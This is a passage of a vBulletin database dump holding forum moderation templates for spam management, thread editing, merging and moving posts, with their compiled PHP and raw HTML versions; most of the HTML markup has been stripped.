    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\".(($type == \'thread\') ? (\"\r\n\r\n\") : (\"\r\n\r\n\r\n\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n
    $vbphrase[spam_management]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[applying_punitive_action_to]\r\n \".(($show[\'username_bits\']) ? (\"\r\n
    \r\n
      \r\n $username_bits\r\n
    \r\n
    \r\n \".(($show[\'remove_info\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[spam_management_remove_posts_warning]\", \"50\") . \"\r\n
    \r\n \") : (\"\")).\"\r\n \") : (\"\r\n
    \r\n $vbphrase[no_punitive_action_users_are_guests]\r\n
    \r\n \")).\"\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \".((!$show[\'punitive_action\']) ? (\"\r\n
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n\r\n\".(($show[\'punitive_action\']) ? (\"\r\n
    \r\n $punitive_action\r\n\") : (\"\")).\"\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n
    $vbphrase[spam_management]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[applying_punitive_action_to]\r\n \r\n
    \r\n
      \r\n $username_bits\r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[spam_management_remove_posts_warning]\r\n
    \r\n
    \r\n \r\n
    \r\n $vbphrase[no_punitive_action_users_are_guests]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $punitive_action\r\n
    \r\n
    ', 'template', 1230039592, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'), (1650, -1, 'threadadmin_easyspam_headinclude', '', '', 'template', 1197387733, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1651, -1, 'threadadmin_easyspam_infraction', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($foruminfo[forumid]) ? (\"$vbphrase[forum]: session->vars[\'sessionurl\'] . \"f=$foruminfo[forumid]\\\">$foruminfo[title]\") : (\"\")).\"\r\n $vbphrase[user_infraction]\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[infraction_level]\r\n \r\n \r\n \r\n \".(($show[\'count\']) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n $infractionbits\r\n \".(($show[\'custominfraction\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
    $vbphrase[title]$vbphrase[active]$vbphrase[points]$vbphrase[expires]$vbphrase[warning]
    $vbphrase[custom_infraction]
    \r\n \r\n \r\n \".(($infractionbits) ? (\"\") : (\"\")).\"\r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[reason]
    $vbphrase[points]
    $vbphrase[expires]
     
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n$postpreview\r\n\r\n\".(($show[\'pm\']) ? (\"\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[post_new_private_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[administrative_note]
      \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message_to_user]
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n \".(($show[\'trackpm\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n \".(($GLOBALS[\'vbulletin\']->userinfo[\'signature\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'parseurl\']) ? (\"
    \") : (\"\")).\"\r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\") : (\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[send_new_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrative_note]
    \r\n \r\n
    \r\n \r\n\r\n \".(($show[\'email\']) ? (\"\r\n \r\n
    \r\n $vbphrase[message_to_user]
    \r\n \r\n
    \r\n \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n\")).\"', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[forum]: $foruminfo[title]\r\n $vbphrase[user_infraction]\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[infraction_level]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $infractionbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]$vbphrase[active]$vbphrase[points]$vbphrase[expires]$vbphrase[warning]
    54\">$vbphrase[custom_infraction]
    54\">\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[reason]
    $vbphrase[points]
    $vbphrase[expires]
     
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n$postpreview\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[post_new_private_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[administrative_note]
      \"$selectedicon[alt]\"
    \r\n \r\n\r\n \r\n
    $vbphrase[message_to_user]
    \r\n $messagearea\r\n \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n$forumrules\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n $vbphrase[send_new_message]\r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[administrative_note]
    \r\n \r\n
    \r\n \r\n\r\n \r\n \r\n
    \r\n $vbphrase[message_to_user]
    \r\n \r\n
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    \r\n
    \r\n
    ', 'template', 1206451841, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'), (1652, -1, 'threadadmin_easyspam_ipbit', '
  • session->vars[\'sessionurl\'] . \"do=getip&ip=$ip\\\" target=\\\"ipinfo\\\">$ip
  • ', '
  • $ip
  • ', 'template', 1203935130, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1653, -1, 'threadadmin_easyspam_ip_option', '
  • session->vars[\'sessionurl\'] . \"do=getip&p=$postid\\\" target=\\\"ipinfo\\\">$ip
  • ', '
  • $ip
  • ', 'template', 1190373941, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1654, -1, 'threadadmin_easyspam_skipped_prune', '
    options[\'forumhome\'] . \".php\\\" method=\\\"get\\\" onsubmit=\\\"window.location = \'$url\'; return false;\\\" name=\\\"vbform\\\">\r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[spam_management]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[affected_users]\r\n
    $vbphrase[users_too_many_post_warning]
    \r\n
    $vbphrase[punitive_actions_still_performed]
    \r\n
      $users
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[spam_management]
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[affected_users]\r\n
    $vbphrase[users_too_many_post_warning]
    \r\n
    $vbphrase[punitive_actions_still_performed]
    \r\n
      $users
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208876640, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1655, -1, 'threadadmin_easyspam_userbit', '
  • session->vars[\'sessionurl\'] . \"u=$user[userid]\\\" target=\\\"userinfo\\\">$user[username]
  • ', '
  • $user[username]
  • ', 'template', 1191581142, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1656, -1, 'threadadmin_easyspam_user_option', '
  • \r\n\".(($show[\'userid_checkbox\']) ? (\"\r\n \".(($show[\'prevent_userselection\']) ? (\"\r\n *\r\n \") : (\"\r\n \r\n \")).\"\r\n\") : (\"\")).\"\r\nsession->vars[\'sessionurl\'] . \"u=$user[userid]\\\" target=\\\"spamuserinfo\\\">$user[username]
    \" . construct_phrase(\"$vbphrase[registered_x_posts_y]\", \"$user[joindate_string]\", \"$user[post_count]\") . \"
    \r\n
  • ', '
  • \r\n\r\n \r\n *\r\n \r\n \r\n \r\n\r\n$user[username]
    $vbphrase[registered_x_posts_y]
    \r\n
  • ', 'template', 1199287452, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1657, -1, 'threadadmin_editthread', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_thread]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
    \r\n \".(($prefix_options) ? (\"\r\n \r\n \") : (\"\")).\"\r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" />\r\n   \\\"$selectedicon[alt]\\\"
    \r\n \r\n\r\n
    \r\n $vbphrase[moderator_notes] / $vbphrase[thread_summary]:
    \r\n \r\n
    \r\n\r\n \".(($show[\'undeleteoption\']) ? (\"\r\n
    \r\n $vbphrase[deletion_status]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[item_deleted_would_you_like_to]
    \r\n
    \r\n
    \r\n \".(($show[\'removeoption\']) ? (\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'options\']) ? (\"\r\n
    \r\n $vbphrase[options]\r\n
    \r\n
    \r\n
    \r\n \".(($show[\'moderateoption\']) ? (\"\r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'redirect\']) ? (\"\r\n
    \r\n $vbphrase[redirect]\r\n
    \r\n \".(($show[\'expires\']) ? (\"
    \" . construct_phrase(\"$vbphrase[this_redirect_expires_on_x_at_y]\", \"$threadinfo[expiredate]\", \"$threadinfo[expiretime]\") . \"
    \") : (\"\")).\"\r\n \".(($show[\'cpermanent\']) ? (\"
    \") : (\"\")).\"\r\n \".(($show[\'cexpires\']) ? (\"\r\n
    \r\n \") : (\"\r\n
    \r\n \")).\"\r\n \\\"\\\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\".(($show[\'modlog\']) ? (\"\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'ipaddress\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n $logbits\r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[moderator_log]\r\n
    $vbphrase[date]$vbphrase[username]$vbphrase[action]$vbphrase[post]$vbphrase[ip_address]
    \r\n\") : (\"\")).\"', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[edit_thread]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[title]:
    \r\n \r\n \r\n \r\n \r\n   \"$selectedicon[alt]\"
    \r\n \r\n\r\n
    \r\n $vbphrase[moderator_notes] / $vbphrase[thread_summary]:
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[deletion_status]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[item_deleted_would_you_like_to]
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[options]\r\n
    \r\n
    \r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[redirect]\r\n
    \r\n
    $vbphrase[this_redirect_expires_on_x_at_y]
    \r\n
    \r\n \r\n
    \r\n \r\n
    \r\n
    \r\n \"\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n
    \r\n
    \r\n\r\n $posticons\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $logbits\r\n\r\n
    \r\n \"\"\r\n $vbphrase[moderator_log]\r\n
    $vbphrase[date]$vbphrase[username]$vbphrase[action]$vbphrase[post]$vbphrase[ip_address]
    \r\n
    ', 'template', 1208875813, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1658, -1, 'threadadmin_imod_menu_post', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    $vbphrase[from_this_page]
    $vbphrase[select_all]
    $vbphrase[deselect_all]
    $vbphrase[invert_selection]
    options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" />
    $vbphrase[select_unapproved_posts]
    $vbphrase[select_deleted_posts]
    $vbphrase[select_posts_with_attachments]
    $vbphrase[select_posts_from_guests]
    ', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    $vbphrase[from_this_page]
    $vbphrase[select_all]
    $vbphrase[deselect_all]
    $vbphrase[invert_selection]
    \"\"
    $vbphrase[select_unapproved_posts]
    $vbphrase[select_deleted_posts]
    $vbphrase[select_posts_with_attachments]
    $vbphrase[select_posts_from_guests]
    ', 'template', 1194370354, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1659, -1, 'threadadmin_imod_menu_thread', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    $vbphrase[from_this_page]
    $vbphrase[select_all]
    $vbphrase[deselect_all]
    $vbphrase[invert_selection]
    options[\'cleargifurl\'] . \"\\\" alt=\\\"\\\" width=\\\"1\\\" height=\\\"1\\\" />
    $vbphrase[select_closed_threads]
    $vbphrase[select_unapproved_threads]
    $vbphrase[select_deleted_threads]
    $vbphrase[select_sticky_threads]
    $vbphrase[select_threads_with_polls]
    $vbphrase[select_threads_with_attachments]
    ', '\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
    $vbphrase[from_this_page]
    $vbphrase[select_all]
    $vbphrase[deselect_all]
    $vbphrase[invert_selection]
    \"\"
    $vbphrase[select_closed_threads]
    $vbphrase[select_unapproved_threads]
    $vbphrase[select_deleted_threads]
    $vbphrase[select_sticky_threads]
    $vbphrase[select_threads_with_polls]
    $vbphrase[select_threads_with_attachments]
    ', 'template', 1194370360, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1660, -1, 'threadadmin_logbit', '\r\n $log[dateline]\r\n $log[username]\r\n $log[action]\r\n \".(($log[\'postid\']) ? (\"session->vars[\'sessionurl\'] . \"p=$log[postid]\\\">$log[title]\") : (\" \")).\"\r\n \".(($show[\'ipaddress\']) ? (\"\".(($log[\'ipaddress\']) ? (\"session->vars[\'sessionurl\'] . \"do=getip&ip=$log[ipaddress]\\\">$log[ipaddress]\") : (\" \")).\"\") : (\"\")).\"\r\n', '\r\n $log[dateline]\r\n $log[username]\r\n $log[action]\r\n $log[title] \r\n $log[ipaddress] \r\n', 'template', 1116343439, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'), (1661, -1, 'threadadmin_managepost', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[manage_post]
    \r\n
    \r\n
    \r\n\r\n \".(($show[\'undeleteoption\']) ? (\"\r\n
    \r\n $vbphrase[deletion_status]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[item_deleted_would_you_like_to]
    \r\n
    \r\n
    \r\n \".(($show[\'harddelete\']) ? (\"
    \") : (\"\")).\"\r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[info]
    \r\n \r\n $postinfo[postdate] $postinfo[posttime]\r\n \r\n session->vars[\'sessionurl\'] . \"u=$postinfo[userid]\\\">$postinfo[username]\r\n
    $postinfo[pagetext]
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[manage_post]
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[deletion_status]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    $vbphrase[item_deleted_would_you_like_to]
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n $vbphrase[reason_for_deletion]:
    \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[info]
    \r\n \r\n $postinfo[postdate] $postinfo[posttime]\r\n \r\n $postinfo[username]\r\n
    $postinfo[pagetext]
    \r\n\r\n
    ', 'template', 1208875790, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1662, -1, 'threadadmin_mergeposts', '\r\n\r\n
    options[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n $errorreview\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
    $vbphrase[merge_posts]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[options]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[thread]
    \r\n
    $titlebit
    \r\n
    \r\n\r\n \r\n\r\n \r\n
    \r\n $vbphrase[post]
    \r\n \r\n
    \r\n \r\n\r\n \r\n \".(($show[\'userchoice\']) ? (\"\r\n
    \r\n $vbphrase[username]
    \r\n \r\n
    \r\n \") : (\"\")).\"\r\n \r\n\r\n \r\n
    \r\n $vbphrase[title]
    \r\n options[\'titlemaxchars\'] . \"\\\" tabindex=\\\"1\\\" title=\\\"$vbphrase[optional]\\\" value=\\\"$edit[title]\\\" />\r\n
    \r\n \r\n\r\n \r\n
    \r\n $vbphrase[reason]
    \r\n \r\n
    \r\n \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[merging_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[message]
    \r\n\r\n $messagearea\r\n \r\n\r\n
    \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n
    \r\n \\\"\\\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '\r\n\r\n
    onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n $errorreview\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n
    $vbphrase[merge_posts]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[options]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[thread]
    \r\n
    $titlebit
    \r\n
    \r\n\r\n \r\n\r\n \r\n
    \r\n $vbphrase[post]
    \r\n \r\n
    \r\n \r\n\r\n \r\n \r\n
    \r\n $vbphrase[username]
    \r\n \r\n
    \r\n
    \r\n \r\n\r\n \r\n
    \r\n $vbphrase[title]
    \r\n \r\n
    \r\n \r\n\r\n \r\n
    \r\n $vbphrase[reason]
    \r\n \r\n
    \r\n \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    $vbphrase[merging_x_posts_from_y_threads_in_z_forums]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n
    \r\n
    \r\n\r\n \r\n
    $vbphrase[message]
    \r\n\r\n $messagearea\r\n \r\n\r\n
    \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n \r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n
    \r\n \"\"\r\n $vbphrase[additional_options]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[miscellaneous_options]\r\n
    \r\n
    \r\n $disablesmiliesoption\r\n
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1213021539, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1663, -1, 'threadadmin_mergethread', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[merge_threads]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[url_of_thread_to_be_merged]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[use_field_to_specify_url_to_combine]
    \r\n\r\n $vbphrase[url_of_thread_to_be_merged]:
    \r\n \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[merge_threads]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[url_of_thread_to_be_merged]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[use_field_to_specify_url_to_combine]
    \r\n\r\n $vbphrase[url_of_thread_to_be_merged]:
    \r\n \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875747, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1664, -1, 'threadadmin_mergethreads', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\".(($show[\'skipclearlist\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[merge_threads]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[options]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[destination_thread]
    \r\n \r\n
    \r\n\r\n
    $vbphrase[destination_forum]
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \".(($pollbits) ? (\"\r\n
    \r\n $vbphrase[polls]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[thread_contain_one_poll]
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n $vbphrase[redirect]\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n \\\"\\\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n\r\n
    \r\n\r\n
    \" . construct_phrase(\"$vbphrase[merging_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    $vbphrase[thread_redirects_can_not_be_merged]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[merge_threads]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[options]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[destination_thread]
    \r\n \r\n
    \r\n\r\n
    $vbphrase[destination_forum]
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[polls]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[thread_contain_one_poll]
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[redirect]\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n \"\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n\r\n
    \r\n\r\n
    $vbphrase[merging_x_threads_from_y_forums]
    \r\n
    $vbphrase[thread_redirects_can_not_be_merged]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n\r\n
    \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875731, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1665, -1, 'threadadmin_moveposts', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_posts]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_posts_to_new_thread]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_posts_to_existing_thread]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[move_posts_note]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
